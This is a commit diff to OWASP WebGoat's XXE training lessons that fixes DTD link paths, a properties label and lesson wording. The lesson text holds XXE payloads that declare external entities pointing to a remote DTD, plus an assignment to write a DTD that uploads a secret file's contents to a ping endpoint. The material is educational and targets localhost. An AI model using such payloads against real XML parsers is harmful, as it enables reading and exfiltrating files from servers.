Fixing links in several lessons

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java

@@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
      * <pre>
      *  <?xml version="1.0"?>
      *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
      *  %remote;
      *   ]>
      *  <user>

webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties

@@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
 xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
 xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
 xxe.content.output=Welcome {0} you can now login to our website
-xxe.blind.output=Contents of the file is:
+xxe.blind.output=Contents of the file is: {0}
 
 xxe.hints.simple.xxe.1=Try submitting the form and see what happens
 xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc

@@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
 Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
 Let's start with an example, in this case we reference a external DTD which we control on our own server.
 
-Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
+Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
 
 [source]
 ----
@@ -33,7 +33,7 @@ Now submit the form and change the xml to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
+<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
 %remote;
 ]>
 <user>
@@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
 So with the XXE we are able to ping our own server which means XXE injection is possible.
 
 [NOTE]
-In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
+In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
 of course be a host fully under the attackers control.

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc

@@ -1,7 +1,10 @@
 == Blind XXE assignment
 
-In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
-contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
-this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
+which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
+For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
 
 Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
+
+You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`